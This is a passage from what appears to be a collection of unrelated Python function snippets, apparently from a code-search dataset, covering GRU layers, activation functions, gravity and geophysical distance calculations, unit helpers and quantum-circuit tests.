new state h_t~\n h_t = (1 - z_t) * h_t_minus_1 + z_t * h_t_candiate # h_t:[batch_size*num_sentences,hidden_size]\n return h_t", "def gelu(input):\n return FunctionLib.apply('Gelu', input.device, [input], approximate=False)", "def base_unit() -> ureg:\n return ureg.meter", "def G(self):\n return self._properties['G']", "def calc_free_g(energies, temperatures):\n pass", "def test_gri_reduction(self):\n model_file = 'gri30.cti'\n\n # Conditions for reduction\n conditions = [\n InputIgnition(\n kind='constant volume', pressure=1.0, temperature=1000.0, equivalence_ratio=1.0,\n fuel={'CH4': 1.0}, oxidizer={'O2': 1.0, 'N2': 3.76}\n ),\n InputIgnition(\n kind='constant volume', pressure=1.0, temperature=1200.0, equivalence_ratio=1.0,\n fuel={'CH4': 1.0}, oxidizer={'O2': 1.0, 'N2': 3.76}\n ),\n ]\n data_files['output_ignition'] = relative_location(\n os.path.join('assets', 'example_ignition_output.txt')\n )\n data_files['data_ignition'] = relative_location(\n os.path.join('assets', 'example_ignition_data.dat')\n )\n error = 5.0\n\n # Run DRG\n with TemporaryDirectory() as temp_dir:\n reduced_model = run_drgep(\n model_file, conditions, [], [], error, ['CH4', 'O2'], ['N2'], \n num_threads=1, path=temp_dir\n )\n\n # Expected answer\n expected_model = ct.Solution(relative_location(os.path.join('assets', 'drgep_gri30.cti')))\n \n # Make sure models are the same\n assert check_equal(reduced_model.model.species_names, expected_model.species_names)\n assert reduced_model.model.n_reactions == expected_model.n_reactions\n assert round(reduced_model.error, 2) == 3.22", "def get_rm(g):\n return 1 / g", "def unit_of_measurement(self):\n return UNIT_GALLONS_PER_MINUTE", "def g(self, RD):\n g = 1 / np.sqrt((1 + 3 * np.power(self.q, 2)) / np.power(np.pi, 2)) \n \n return g", "def reciprocal_cell(self):\n return self.unit_cell.reciprocal()", "def ng(nanograms):\n return Unit(nanograms,\"nanogram\")", "def compile_gru_model(input_dim=101, output_dim=4563, recur_layers=3, nodes=1000,\n conv_context=11, conv_border_mode='valid', conv_stride=2,\n initialization='glorot_uniform', batch_norm=True, num_gpu=1):\n logger.info(\"Building gru model\")\n # Main acoustic input\n acoustic_input = Input(shape=(None, input_dim), name='acoustic_input')\n\n # Setup the network\n #conv_1d = Conv1D(nodes, conv_context, name='conv_1d',\n # padding='same', strides=conv_stride,\n # kernel_initializer=initialization,\n # activation='relu')(acoustic_input)\n conv_1d = Convolution1D(nodes, conv_context, name='conv1d',\n border_mode=conv_border_mode,\n subsample_length=conv_stride, init=initialization,\n activation='relu')(acoustic_input)\n if batch_norm:\n output = normalization.BatchNormalization(name='bn_conv_1d')(conv_1d, training=True)\n else:\n output = conv_1d\n\n for r in range(recur_layers):\n # output = GRU(nodes, activation='relu',\n # name='rnn_{}'.format(r + 1), init=initialization,\n # return_sequences=True)(output)\n output = Bidirectional(GRU(nodes, return_sequences=True),name='bi_lstm_{}'.format(r + 1))(output)\n if batch_norm:\n bn_layer = normalization.BatchNormalization(name='bn_rnn_{}'.format(r + 1),moving_mean_initializer='zeros')\n output = bn_layer(output, training=True)\n\n network_output = TimeDistributed(Dense(\n output_dim+1, name='dense', activation='softmax', init=initialization,\n ))(output)\n model = Model(input=acoustic_input, output=network_output)\n #model.conv_output_length = lambda x: conv_output_length(\n # x, conv_context, conv_border_mode, conv_stride)\n # model = ParallelModel(model, num_gpu)\n 
return model", "def gon(self):\n return dec2gon(self.dec())", "def gon(self):\n return dec2gon(self.dec())", "def geglu(x: Tensor) ->Tensor:\n assert x.shape[-1] % 2 == 0\n a, b = x.chunk(2, dim=-1)\n return a * F.gelu(b)", "def get_molec_uc_to_mg_g(isot_dict):\n if 'conversion_factor_molec_uc_to_gr_gr' in isot_dict.get_dict():\n molec_uc_to_mg_g = isot_dict['conversion_factor_molec_uc_to_gr_gr']\n elif 'conversion_factor_molec_uc_to_mg_g' in isot_dict.get_dict():\n molec_uc_to_mg_g = isot_dict['conversion_factor_molec_uc_to_mg_g']\n return molec_uc_to_mg_g", "def cellGradx(self):\n if getattr(self, '_cellGradx', None) is None:\n G1 = self._cellGradxStencil()\n # Compute areas of cell faces & volumes\n V = self.aveCC2F*self.vol\n L = self.r(self.area/V, 'F','Fx', 'V')\n self._cellGradx = sdiag(L)*G1\n return self._cellGradx", "def standard_gravity():\n mu = 3.986004418E14\n return mu", "def get_rec_rate_grain(ne, G0, T, Z):\n \n psi = G0*T**0.5/ne\n return RecRate.get_alpha_gr(T, psi, Z)", "def compute_gravity(self):\r\n # compute the gravity from the Gauss form.\r\n # if it fails, marks divergence\r\n try:\r\n self.gravsolver.solve()\r\n except:\r\n print(\"GRAVITY DIVERGED\")\r\n\r\n # write to log\r\n self.logfile.write(\"%s: STOPPED DUE TO DIVERGENCE IN GRAVITY \\n\" %\r\n (self.convert_time(time.time() -\r\n self.start_time)))\r\n self.diverged = True # set diverged to True, break the run\r\n return\r\n\r\n # split and update the gravity function with the answers\r\n # note the gravscale\r\n gravg, gravs = self.gravgs.split()\r\n\r\n # assign the result to the gravity function\r\n self.gravity.assign(project(gravg/self.gravscale, self.V))", "def ndcg_per_epoch(self):\n return self.val_ndcg", "def g(self, r, mu):\n\n return np.sqrt(1. - (r / self.R)**2 * (1. - mu**2))", "def generation(self) -> int:\n return self._g", "def unit(g, node_1, node_2):\n return 1", "def gpus(self):\n return self.__gpus", "def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bidirectional=False,\n dropout=0,\n **kwargs\n ):\n super(GRU, self).__init__(\n 'gru', input_size, hidden_size,\n num_layers, bidirectional, dropout, **kwargs\n )", "def genRate(self):\n\n # We need to compute normEsquared before we can compute the generation\n # rate\n normEsq = self.get_scalar_quantity('normEsquared')\n # Prefactor for generation rate. 
Note we gotta convert from m^3 to\n # cm^3, hence 1e6 factor\n fact = consts.epsilon_0 / (consts.hbar * 1e6)\n gvec = np.zeros_like(normEsq)\n # Main loop to compute generation in each layer\n freq = self.conf[('Simulation', 'params', 'frequency')]\n for name, layer in self.layers.items():\n self.log.debug('LAYER: %s', name)\n self.log.debug('LAYER T: %f', layer.thickness)\n self.log.debug('START: %f', layer.start)\n self.log.debug('END: %f', layer.end)\n # Use the layer object to get the nk matrix with correct material\n # geometry\n nmat, kmat = layer.get_nk_matrix(freq, self.X, self.Y)\n gvec[layer.get_slice(self.Z)] = fact * nmat * kmat * normEsq[layer.get_slice(self.Z)]\n # gvec[layer.get_slice()] = nmat * kmat * normEsq[layer.get_slice(self.Z)]\n self.extend_data('genRate', gvec)\n return gvec", "def n(G):\n return G._n", "def getNumLGR(self):\n return self._num_lgr( )", "def _sum_g_i(self) -> float:\n elems = self.composition.get_el_amt_dict()\n\n if self.interpolated:\n sum_g_i = 0\n for elem, amt in elems.items():\n g_interp = interp1d(\n [float(t) for t in G_ELEMS.keys()],\n [g_dict[elem] for g_dict in G_ELEMS.values()],\n )\n sum_g_i += amt * g_interp(self.temp)\n else:\n sum_g_i = sum(amt * G_ELEMS[str(self.temp)][elem] for elem, amt in elems.items())\n\n return sum_g_i", "def expected_g(self):\n raise NotImplementedError()\n # \\sum_{b} \\gamma_b\n trm2 = self.mf_gamma.sum(axis=2)\n E_g = self.mf_gamma / trm2[:,:,None]\n return E_g", "def GravityVector(self):\n if self.Cid() == 0:\n return self.N\n ## TODO: shouldn't be scaled by the ???\n p = self.cid_ref.transform_vector_to_global(self.N)\n return self.scale * p", "def gru(params, h, x):\n bfg = 0.5\n hx = np.concatenate([h, x], axis=0)\n ru = sigmoid(np.dot(params['wRUHX'], hx) + params['bRU'])\n r, u = np.split(ru, 2, axis=0)\n rhx = np.concatenate([r * h, x])\n c = np.tanh(np.dot(params['wCHX'], rhx) + params['bC'] + bfg)\n return u * h + (1.0 - u) * c", "def g(self):\n return 2", "def gagged(self):\r\n return self._gag", "def M_g(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating g\", file=self.logfile)\n M_mu1 = np.lib.stride_tricks.as_strided(self.mu_pad,\n shape=[self.P+1, self.L_h],\n strides=[self.mu_pad.strides[-1], self.mu_pad.strides[-1]])\n\n M_mu1 = M_mu1[::-1,:]\n M_mu2 = np.transpose(M_mu1[1:,:])\n M_mu1 = M_mu1*self.e2\n\n M_mu = np.dot(M_mu1, M_mu2)\n v_mu = M_mu[0,:]\n M_mu = M_mu[1:,:]\n\n M_R = np.zeros((self.P,self.P+1))\n for p in range(1,self.P+1):\n for q in range(0,self.P+1):\n M_R[p-1,q] = np.sum(np.diag(self.R, q-p)[:self.L_h-max(p,q)]*self.e2[max(p,q):self.L_h])\n\n v_R = M_R[:,0]\n M_R = M_R[:,1:]\n\n self.alpha_g = np.dot(np.linalg.inv(M_mu + M_R), v_mu+v_R)\n self.A = np.concatenate([[1], -self.alpha_g])\n\n self._propagate_A()", "def get_diffgrid(u_current, u_fine, dt):\n \n N_current = len(u_current[:,0])\n N_fine = len(u_fine[:,0])\n \n grid_size_ratio = ceil(N_fine/float(N_current))\n \n diffgrid = dt * numpy.sum( numpy.abs(\\\n u_current[:,2]- u_fine[::grid_size_ratio,2])) \n \n return diffgrid", "def updateG(self, dt):\n\t\tself.tissue.G.project( (self.initial * dt + Identity(3)) * self.tissue.G )", "def getGeneratingUnit(self):\n return self._GeneratingUnit", "def genu(self):\n # Check coordinates are defined\n if self._genu is None:\n raise RuntimeError(\"Coordinates not defined for station \" + self._code)\n return self._genu", "def get_upregulated_genes_network(self) -> Graph:\n logger.info(\"In get_upregulated_genes_network()\")\n\n deg_graph = self.graph.copy() # deep 
copy graph\n not_diff_expr = self.graph.vs(up_regulated_eq=False)\n\n # delete genes which are not differentially expressed or have no connections to others\n deg_graph.delete_vertices(not_diff_expr.indices)\n deg_graph.delete_vertices(deg_graph.vs.select(_degree_eq=0))\n\n return deg_graph", "def _get_gpos ( self ):\n bpos = mgrid[self.x_min:self.x_max:self.nxsteps*1j, \\\n self.y_min:self.y_max:self.nysteps*1j, \\\n self.z_min:self.z_max:self.nzsteps*1j]\n bpos.resize((3, self.size))\n return bpos", "def test_grovers_minimal_basis_gates(self):\n shots = 2000\n circuits = ref_algorithms.grovers_circuit(final_measure=True,\n allow_sampling=True)\n targets = ref_algorithms.grovers_counts(shots)\n job = execute(circuits, QasmSimulator(), shots=shots, basis_gates='U,CX')\n result = job.result()\n self.is_completed(result)\n self.compare_counts(result, circuits, targets, delta=0.05 * shots)", "def GIoU(self, bboxes1: torch.Tensor, bboxes2: torch.Tensor) -> float:\n iou = IoU(bboxes1, bboxes2)\n giou = 0.0\n return giou", "def fGT(self):\n pass", "def g(self):\n return self.moves", "def test_grovers_waltz_basis_gates(self):\n shots = 2000\n circuits = ref_algorithms.grovers_circuit(final_measure=True,\n allow_sampling=True)\n targets = ref_algorithms.grovers_counts(shots)\n job = execute(circuits, QasmSimulator(), shots=shots, basis_gates='u1,u2,u3,cx')\n result = job.result()\n self.is_completed(result)\n self.compare_counts(result, circuits, targets, delta=0.05 * shots)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def rnn_gru(\n nclass,\n input_shape=(187, 1),\n recurrent_layers=[64, 128],\n dense_layers=[64, 16],\n dropout=0.2,\n binary=False,\n):\n if not binary:\n loss = losses.sparse_categorical_crossentropy\n last_activation = activations.softmax\n else:\n loss = losses.binary_crossentropy\n last_activation = activations.sigmoid\n return_sequences = True\n\n inp = Input(shape=input_shape)\n x = inp\n for i, neurons in enumerate(recurrent_layers):\n x = GRU(neurons, return_sequences=return_sequences)(x)\n x = Dropout(rate=dropout)(x)\n return_sequences = False\n for i, neurons in enumerate(dense_layers):\n x = Dense(neurons, name=f\"dense_{i+1}\", activation=\"relu\")(x)\n x = Dense(nclass, name=\"Output\", activation=last_activation)(x)\n\n model = models.Model(inputs=inp, outputs=x)\n opt = optimizers.Adam(0.001)\n model.compile(optimizer=opt, loss=loss, metrics=[\"acc\"])\n model.summary()\n return model", "def build_rnn_cell(type, num_units, dropout):\n cell = tf.nn.rnn_cell.BasicRNNCell(num_units)\n if dropout:\n result = tf.nn.rnn_cell.DropoutWrapper(cell,\n output_keep_prob=1-dropout)\n return result", "def compute_g_0(self, j):\n #Compute variance and mean denominator (same denominator for both)\n denominator = self.sigma2 * self.sigma_g_star_2[0, j] + (10**8) * self.sigma2\n\n numerator_mean = (10**8) * self.sigma2 * self.g_heat[1,j]\n if (self.u_heat > self.temperatures[0]):\n denominator = denominator + (10**8) * self.sigma_g_star_2[0, j] * ((self.temperatures[0] - self.u_heat )**2)\n numerator_mean = numerator_mean + \\\n (10**8) * self.sigma_g_star_2[0, j] * (self.temperatures[0] - self.u_heat) * (self.consumptions[0] - self.s[0,j] * self.kappa[self.daytypes[0]])\n\n #Mean\n mean = numerator_mean / denominator\n\n #Compute variance numerator\n variance_numerator = ((10**8) * self.sigma2 * self.sigma_g_star_2[0, j])\n #Variance\n variance = variance_numerator / denominator\n\n 
self.g_heat[0,j] = self.truncated_norm(-inf, 0, mean, variance)", "def generation(x, g):\n return int(x/g)", "def test_ggn_implementation(problem):\n problem.set_up()\n\n diag_ggn_from_full = AutogradExtensions(problem).diag_ggn_via_ggn()\n diag_ggn_from_block = AutogradExtensions(problem).diag_ggn()\n\n check_sizes_and_values(diag_ggn_from_full, diag_ggn_from_block)\n problem.tear_down()", "def Generate_Ginibre(n):\n G_real = np.random.normal(scale= np.sqrt(1/(2*n)), size=[n,n])\n G_im = np.random.normal(scale= np.sqrt(1/(2*n)), size=[n,n]) * complex(0,1)\n G = G_real + G_im\n return G", "def nut(self, guess, sampledU, wallGradU):\n magGradU = np.abs(wallGradU)\n uTau = self.utau(guess, sampledU)\n return np.max([0.0, uTau**2/magGradU - self.nu])", "def calc_gravitational_energy(self):\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j):\n return np.sum((mu[2::2] - mu[:-2:2]) * (star.rho[:-2:2, j] * star.Phi[:-2:2, j] +\n 4 * star.rho[1:-1:2, j] * star.Phi[1:-1:2, j] +\n star.rho[2::2, j] * star.Phi[2::2, j])) / 6\n\n W = 0\n\n for j in range(0, N - 2, 2):\n W += (r[j + 2] - r[j]) * (r[j]**2 * S1(j) +\n 4 * r[j + 1]**2 * S1(j + 1) +\n r[j + 2]**2 * S1(j + 2))\n\n return -1 / 3 * np.pi * W", "def _computeGC2(rupture, lon, lat, depth):\n\n quadlist = rupture.getQuadrilaterals()\n quadgc2 = copy.deepcopy(quadlist)\n\n oldshape = lon.shape\n\n if len(oldshape) == 2:\n newshape = (oldshape[0] * oldshape[1], 1)\n else:\n newshape = (oldshape[0], 1)\n\n # -------------------------------------------------------------------------\n # Define a projection that spans sites and rupture\n # -------------------------------------------------------------------------\n\n all_lat = np.append(lat, rupture.lats)\n all_lon = np.append(lon, rupture.lons)\n\n west = np.nanmin(all_lon)\n east = np.nanmax(all_lon)\n south = np.nanmin(all_lat)\n north = np.nanmax(all_lat)\n proj = OrthographicProjection(west, east, north, south)\n\n totweight = np.zeros(newshape, dtype=lon.dtype)\n GC2T = np.zeros(newshape, dtype=lon.dtype)\n GC2U = np.zeros(newshape, dtype=lon.dtype)\n\n # -------------------------------------------------------------------------\n # First sort out strike discordance and nominal strike prior to\n # starting the loop if there is more than one group/trace.\n # -------------------------------------------------------------------------\n group_ind = rupture._getGroupIndex()\n\n # Need group_ind as numpy array for sensible indexing...\n group_ind_np = np.array(group_ind)\n uind = np.unique(group_ind_np)\n n_groups = len(uind)\n\n if n_groups > 1:\n # ---------------------------------------------------------------------\n # The first thing we need to worry about is finding the coordinate\n # shift. 
U's origin is \"selected from the two endpoints most\n # distant from each other.\"\n # ---------------------------------------------------------------------\n\n # Need to get index of first and last quad\n # for each segment\n iq0 = np.zeros(n_groups, dtype='int16')\n iq1 = np.zeros(n_groups, dtype='int16')\n for k in uind:\n ii = [i for i, j in enumerate(group_ind) if j == uind[k]]\n iq0[k] = int(np.min(ii))\n iq1[k] = int(np.max(ii))\n\n # ---------------------------------------------------------------------\n # This is an iterator for each possible combination of traces\n # including trace orientations (i.e., flipped).\n # ---------------------------------------------------------------------\n\n it_seg = it.product(it.combinations(uind, 2),\n it.product([0, 1], [0, 1]))\n\n # Placeholder for the trace pair/orientation that gives the\n # largest distance.\n dist_save = 0\n\n for k in it_seg:\n s0ind = k[0][0]\n s1ind = k[0][1]\n p0ind = k[1][0]\n p1ind = k[1][1]\n if p0ind == 0:\n P0 = quadlist[iq0[s0ind]][0]\n else:\n P0 = quadlist[iq1[s0ind]][1]\n if p1ind == 0:\n P1 = quadlist[iq1[s1ind]][0]\n else:\n P1 = quadlist[iq0[s1ind]][1]\n\n dist = geodetic.distance(P0.longitude, P0.latitude, 0.0,\n P1.longitude, P1.latitude, 0.0)\n if dist > dist_save:\n dist_save = dist\n A0 = P0\n A1 = P1\n\n # ---------------------------------------------------------------------\n # A0 and A1 are the furthest two segment endpoints, but we still\n # need to sort out which one is the \"origin\".\n # ---------------------------------------------------------------------\n\n # This goofy while-loop is to adjust the side of the rupture where the\n # origin is located\n dummy = -1\n while dummy < 0:\n A0.depth = 0\n A1.depth = 0\n p_origin = Vector.fromPoint(A0)\n a0 = Vector.fromPoint(A0)\n a1 = Vector.fromPoint(A1)\n ahat = (a1 - a0).norm()\n\n # Loop over traces\n e_j = np.zeros(n_groups)\n b_prime = [None] * n_groups\n for j in range(n_groups):\n P0 = quadlist[iq0[j]][0]\n P1 = quadlist[iq1[j]][1]\n P0.depth = 0\n P1.depth = 0\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n b_prime[j] = p1 - p0\n e_j[j] = ahat.dot(b_prime[j])\n E = np.sum(e_j)\n\n # List of discordancy\n dc = [np.sign(a) * np.sign(E) for a in e_j]\n b = Vector(0, 0, 0)\n for j in range(n_groups):\n b.x = b.x + b_prime[j].x * dc[j]\n b.y = b.y + b_prime[j].y * dc[j]\n b.z = b.z + b_prime[j].z * dc[j]\n bhat = b.norm()\n dummy = bhat.dot(ahat)\n if dummy < 0:\n tmpA0 = copy.deepcopy(A0)\n A0 = copy.deepcopy(A1)\n A1 = tmpA0\n\n # ---------------------------------------------------------------------\n # To fix discordancy, need to flip quads and rearrange\n # the order of quadgc2\n # ---------------------------------------------------------------------\n\n # 1) flip quads\n for i in range(len(quadgc2)):\n if dc[group_ind[i]] < 0:\n quadgc2[i] = reverse_quad(quadgc2[i])\n\n # 2) rearrange quadlist order\n qind = np.arange(len(quadgc2))\n for i in range(n_groups):\n qsel = qind[group_ind_np == uind[i]]\n if dc[i] < 0:\n qrev = qsel[::-1]\n qind[group_ind_np == uind[i]] = qrev\n\n quadgc2old = copy.deepcopy(quadgc2)\n for i in range(len(qind)):\n quadgc2[i] = quadgc2old[qind[i]]\n\n # End of if-statement for adjusting group discordancy\n\n s_i = 0.0\n l_i = np.zeros(len(quadgc2))\n\n for i in range(len(quadgc2)):\n G0, G1, G2, G3 = quadgc2[i]\n\n # Compute u_i and t_i for this quad\n t_i = __calc_t_i(G0, G1, lat, lon, proj)\n u_i = __calc_u_i(G0, G1, lat, lon, proj)\n\n # Quad length (top edge)\n l_i[i] = get_quad_length(quadgc2[i])\n\n 
# ---------------------------------------------------------------------\n # Weight of segment, three cases\n # ---------------------------------------------------------------------\n\n # Case 3: t_i == 0 and 0 <= u_i <= l_i\n w_i = np.zeros_like(t_i)\n\n # To avoid division by zero in totweight later on:\n ix = (t_i == 0) & (0 <= u_i) & (u_i <= l_i[i])\n totweight[ix] = 1.0\n\n # Case 1:\n ix = t_i != 0\n w_i[ix] = (1.0 / t_i[ix]) * (np.arctan(\n (l_i[i] - u_i[ix]) / t_i[ix]) - np.arctan(-u_i[ix] / t_i[ix]))\n\n # Case 2:\n ix = (t_i == 0) & ((u_i < 0) | (u_i > l_i[i]))\n w_i[ix] = 1 / (u_i[ix] - l_i[i]) - 1 / u_i[ix]\n\n totweight = totweight + w_i\n GC2T = GC2T + w_i * t_i\n\n if n_groups == 1:\n GC2U = GC2U + w_i * (u_i + s_i)\n else:\n if i == 0:\n qind = np.array(range(len(quadgc2)))\n l_kj = 0\n s_ij_1 = 0\n else:\n l_kj = l_i[(group_ind_np == group_ind_np[i]) & (qind < i)]\n s_ij_1 = np.sum(l_kj)\n\n # First endpoint in the current 'group' (or 'trace' in GC2 terms)\n p1 = Vector.fromPoint(quadgc2[iq0[group_ind[i]]][0])\n s_ij_2 = (p1 - p_origin).dot(np.sign(E) * ahat) / 1000.0\n\n # Above is GC2N, for GC2T use:\n # s_ij_2 = (p1 - p_origin).dot(bhat) / 1000.0\n\n s_ij = s_ij_1 + s_ij_2\n GC2U = GC2U + w_i * (u_i + s_ij)\n\n s_i = s_i + l_i[i]\n\n GC2T = GC2T / totweight\n GC2U = GC2U / totweight\n\n # Dictionary for holding the distances\n distdict = dict()\n\n distdict['T'] = copy.deepcopy(GC2T).reshape(oldshape)\n distdict['U'] = copy.deepcopy(GC2U).reshape(oldshape)\n\n # Take care of Rx\n Rx = copy.deepcopy(GC2T) # preserve sign (no absolute value)\n Rx = Rx.reshape(oldshape)\n distdict['rx'] = Rx\n\n # Ry\n Ry = GC2U - s_i / 2.0\n Ry = Ry.reshape(oldshape)\n distdict['ry'] = Ry\n\n # Ry0\n Ry0 = np.zeros_like(GC2U)\n ix = GC2U < 0\n Ry0[ix] = np.abs(GC2U[ix])\n if n_groups > 1:\n s_i = s_ij + l_i[-1]\n ix = GC2U > s_i\n Ry0[ix] = GC2U[ix] - s_i\n Ry0 = Ry0.reshape(oldshape)\n distdict['ry0'] = Ry0\n\n return distdict", "def gb(self):\n return self.data.gb", "def genus(self):\n return 1 - self.euler_characteristic() // 2", "def ez_spevtg(self, ez):\n assert(ez['GRSINCFNDRSNG'].dtype.type in [np.int64, np.float64])\n assert(ez['GRSINCGAMING'].dtype.type in [np.int64, np.float64])\n\n return ez['GRSINCFNDRSNG'] + ez['GRSINCGAMING']", "def units(self):\n pass", "def _computeGC2(rupture, lon, lat, depth):\n\n quadlist = rupture.getQuadrilaterals()\n quadgc2 = copy.deepcopy(quadlist)\n\n oldshape = lon.shape\n\n if len(oldshape) == 2:\n newshape = (oldshape[0] * oldshape[1], 1)\n else:\n newshape = (oldshape[0], 1)\n\n #--------------------------------------------------------------------------\n # Define a projection that spans sites and rupture\n #--------------------------------------------------------------------------\n\n all_lat = np.append(lat, rupture.lats)\n all_lon = np.append(lon, rupture.lons)\n\n west = np.nanmin(all_lon)\n east = np.nanmax(all_lon)\n south = np.nanmin(all_lat)\n north = np.nanmax(all_lat)\n proj = get_orthographic_projection(west, east, north, south)\n\n totweight = np.zeros(newshape, dtype=lon.dtype)\n GC2T = np.zeros(newshape, dtype=lon.dtype)\n GC2U = np.zeros(newshape, dtype=lon.dtype)\n\n #--------------------------------------------------------------------------\n # First sort out strike discordance and nominal strike prior to\n # starting the loop if there is more than one group/trace.\n #--------------------------------------------------------------------------\n group_ind = rupture._getGroupIndex()\n\n # Need group_ind as numpy array for sensible 
indexing...\n group_ind_np = np.array(group_ind)\n uind = np.unique(group_ind_np)\n n_groups = len(uind)\n\n if n_groups > 1:\n #----------------------------------------------------------------------\n # The first thing we need to worry about is finding the coordinate\n # shift. U's origin is \"selected from the two endpoints most\n # distant from each other.\"\n #----------------------------------------------------------------------\n\n # Need to get index of first and last quad\n # for each segment\n iq0 = np.zeros(n_groups, dtype='int16')\n iq1 = np.zeros(n_groups, dtype='int16')\n for k in uind:\n ii = [i for i, j in enumerate(group_ind) if j == uind[k]]\n iq0[k] = int(np.min(ii))\n iq1[k] = int(np.max(ii))\n\n #----------------------------------------------------------------------\n # This is an iterator for each possible combination of traces\n # including trace orientations (i.e., flipped).\n #----------------------------------------------------------------------\n\n it_seg = it.product(it.combinations(uind, 2),\n it.product([0, 1], [0, 1]))\n\n # Placeholder for the trace pair/orientation that gives the\n # largest distance.\n dist_save = 0\n\n for k in it_seg:\n s0ind = k[0][0]\n s1ind = k[0][1]\n p0ind = k[1][0]\n p1ind = k[1][1]\n if p0ind == 0:\n P0 = quadlist[iq0[s0ind]][0]\n else:\n P0 = quadlist[iq1[s0ind]][1]\n if p1ind == 0:\n P1 = quadlist[iq1[s1ind]][0]\n else:\n P1 = quadlist[iq0[s1ind]][1]\n\n dist = geodetic.distance(P0.longitude, P0.latitude, 0.0,\n P1.longitude, P1.latitude, 0.0)\n if dist > dist_save:\n dist_save = dist\n A0 = P0\n A1 = P1\n\n #----------------------------------------------------------------------\n # A0 and A1 are the furthest two segment endpoints, but we still\n # need to sort out which one is the \"origin\".\n #----------------------------------------------------------------------\n\n # This goofy while-loop is to adjust the side of the rupture where the\n # origin is located\n dummy = -1\n while dummy < 0:\n A0.depth = 0\n A1.depth = 0\n p_origin = Vector.fromPoint(A0)\n a0 = Vector.fromPoint(A0)\n a1 = Vector.fromPoint(A1)\n ahat = (a1 - a0).norm()\n\n # Loop over traces\n e_j = np.zeros(n_groups)\n b_prime = [None] * n_groups\n for j in range(n_groups):\n P0 = quadlist[iq0[j]][0]\n P1 = quadlist[iq1[j]][1]\n P0.depth = 0\n P1.depth = 0\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n b_prime[j] = p1 - p0\n e_j[j] = ahat.dot(b_prime[j])\n E = np.sum(e_j)\n\n # List of discordancy\n dc = [np.sign(a) * np.sign(E) for a in e_j]\n b = Vector(0, 0, 0)\n for j in range(n_groups):\n b.x = b.x + b_prime[j].x * dc[j]\n b.y = b.y + b_prime[j].y * dc[j]\n b.z = b.z + b_prime[j].z * dc[j]\n bhat = b.norm()\n dummy = bhat.dot(ahat)\n if dummy < 0:\n tmpA0 = copy.deepcopy(A0)\n tmpA1 = copy.deepcopy(A1)\n A0 = tmpA1\n A1 = tmpA0\n\n #----------------------------------------------------------------------\n # To fix discordancy, need to flip quads and rearrange\n # the order of quadgc2\n #----------------------------------------------------------------------\n\n # 1) flip quads\n for i in range(len(quadgc2)):\n if dc[group_ind[i]] < 0:\n quadgc2[i] = reverse_quad(quadgc2[i])\n\n # 2) rearrange quadlist order\n qind = np.arange(len(quadgc2))\n for i in range(n_groups):\n qsel = qind[group_ind_np == uind[i]]\n if dc[i] < 0:\n qrev = qsel[::-1]\n qind[group_ind_np == uind[i]] = qrev\n\n quadgc2old = copy.deepcopy(quadgc2)\n for i in range(len(qind)):\n quadgc2[i] = quadgc2old[qind[i]]\n\n # End of if-statement for adjusting group discordancy\n\n s_i = 
0.0\n l_i = np.zeros(len(quadgc2))\n\n for i in range(len(quadgc2)):\n G0, G1, G2, G3 = quadgc2[i]\n\n # Compute u_i and t_i for this quad\n t_i = __calc_t_i(G0, G1, lat, lon, proj)\n u_i = __calc_u_i(G0, G1, lat, lon, proj)\n\n # Quad length (top edge)\n l_i[i] = get_quad_length(quadgc2[i])\n\n #----------------------------------------------------------------------\n # Weight of segment, three cases\n #----------------------------------------------------------------------\n\n # Case 3: t_i == 0 and 0 <= u_i <= l_i\n w_i = np.zeros_like(t_i)\n\n # Case 1:\n ix = t_i != 0\n w_i[ix] = (1.0 / t_i[ix]) * (np.arctan((l_i[i] -\n u_i[ix]) / t_i[ix]) - np.arctan(-u_i[ix] / t_i[ix]))\n\n # Case 2:\n ix = (t_i == 0) & ((u_i < 0) | (u_i > l_i[i]))\n w_i[ix] = 1 / (u_i[ix] - l_i[i]) - 1 / u_i[ix]\n\n totweight = totweight + w_i\n GC2T = GC2T + w_i * t_i\n\n if n_groups == 1:\n GC2U = GC2U + w_i * (u_i + s_i)\n else:\n if i == 0:\n qind = np.array(range(len(quadgc2)))\n l_kj = 0\n s_ij_1 = 0\n else:\n l_kj = l_i[(group_ind_np == group_ind_np[i]) & (qind < i)]\n s_ij_1 = np.sum(l_kj)\n\n # First endpoint in the current 'group' (or 'trace' in GC2 terms)\n p1 = Vector.fromPoint(quadgc2[iq0[group_ind[i]]][0])\n s_ij_2 = (p1 - p_origin).dot(np.sign(E) * ahat) / 1000.0\n\n # Above is GC2N, for GC2T use:\n #s_ij_2 = (p1 - p_origin).dot(bhat) / 1000.0\n\n s_ij = s_ij_1 + s_ij_2\n GC2U = GC2U + w_i * (u_i + s_ij)\n\n s_i = s_i + l_i[i]\n\n GC2T = GC2T / totweight\n GC2U = GC2U / totweight\n\n # Dictionary for holding the distances\n distdict = dict()\n\n distdict['T'] = copy.deepcopy(GC2T).reshape(oldshape)\n distdict['U'] = copy.deepcopy(GC2U).reshape(oldshape)\n\n # Take care of Rx\n Rx = copy.deepcopy(GC2T) # preserve sign (no absolute value)\n Rx = Rx.reshape(oldshape)\n distdict['rx'] = Rx\n\n # Ry\n Ry = GC2U - s_i / 2.0\n Ry = Ry.reshape(oldshape)\n distdict['ry'] = Ry\n\n # Ry0\n Ry0 = np.zeros_like(GC2U)\n ix = GC2U < 0\n Ry0[ix] = np.abs(GC2U[ix])\n if n_groups > 1:\n s_i = s_ij + l_i[-1]\n ix = GC2U > s_i\n Ry0[ix] = GC2U[ix] - s_i\n Ry0 = Ry0.reshape(oldshape)\n distdict['ry0'] = Ry0\n\n return distdict", "def gelu(x):\n return f_gelu(x)", "def __call__(self, inputs, state, scope=None):\n with tf.variable_scope(scope or type(self).__name__): # \"GRUCell\"\n with tf.variable_scope(\"Gates\"): # Reset gate and update gate.\n # We start with bias of 1.0 to not reset and not update.\n r, u = tf.split(1, 2, linear([inputs, state],\n 2 * self._num_units, True, 1.0))\n r, u = tf.nn.sigmoid(r), tf.nn.sigmoid(u)\n with tf.variable_scope(\"Candidate\"):\n c = self._activation(linear([inputs, r * state],\n self._num_units, True))\n new_h = u * state + (1 - u) * c\n return tf.concat(1, [new_h, r, u]), new_h", "def garnet():\n\n rho = 3660.\n\n C = np.zeros((6,6), dtype=float)\n 